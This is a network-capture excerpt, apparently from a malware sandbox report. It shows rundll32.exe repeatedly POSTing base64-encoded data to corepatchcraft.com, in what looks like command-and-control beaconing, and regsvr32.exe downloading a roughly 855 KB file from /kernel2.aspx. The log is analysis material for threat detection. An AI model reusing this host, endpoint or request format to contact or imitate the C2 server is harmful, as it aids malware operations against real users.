                        2025-01-16 05:02:47 UTC | 20 | IN | Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        38 | 192.168.2.6 | 64401 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:48 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:48 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:48 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:48 UTC | 20 | IN | Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        39 | 192.168.2.6 | 64410 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:49 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:50 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:49 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:50 UTC | 20 | IN | Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        40 | 192.168.2.6 | 64416 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:51 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:51 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:51 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:51 UTC | 20 | IN | Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        41 | 192.168.2.6 | 64417 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:52 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:52 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:52 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:52 UTC | 20 | IN | Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        42 | 192.168.2.6 | 64418 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:53 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:54 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:54 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:54 UTC | 20 | IN | Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        43 | 192.168.2.6 | 64419 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:55 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:55 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:55 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:55 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:55 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        44 | 192.168.2.6 | 64420 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:56 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:56 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:57 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:56 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:57 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        45 | 192.168.2.6 | 64421 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:57 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:57 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:58 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:58 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:58 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        46 | 192.168.2.6 | 64422 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:59 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:59 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:59 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:59 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:59 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        47 | 192.168.2.6 | 64423 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:00 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:00 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:01 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:01 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:01 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        48 | 192.168.2.6 | 64425 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:02 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:02 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:02 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:02 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:02 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        49 | 192.168.2.6 | 64426 | 94.159.113.213 | 443 | 4980 | C:\Windows\SysWOW64\regsvr32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:03 UTC | 81 | OUT | GET /kernel2.aspx HTTP/1.1
                        Host: corepatchcraft.com
                        Cache-Control: no-cache
                        2025-01-16 05:03:03 UTC | 252 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:03 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        Last-Modified: Fri, 10 Jan 2025 13:04:21 GMT
                        ETag: "d0d40-62b59bbb4c5fe"
                        Accept-Ranges: bytes
                        Content-Length: 855360
                        Connection: close


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        50 | 192.168.2.6 | 64427 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:03 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:03 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:04 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:03 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:04 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        51 | 192.168.2.6 | 64428 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:05 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
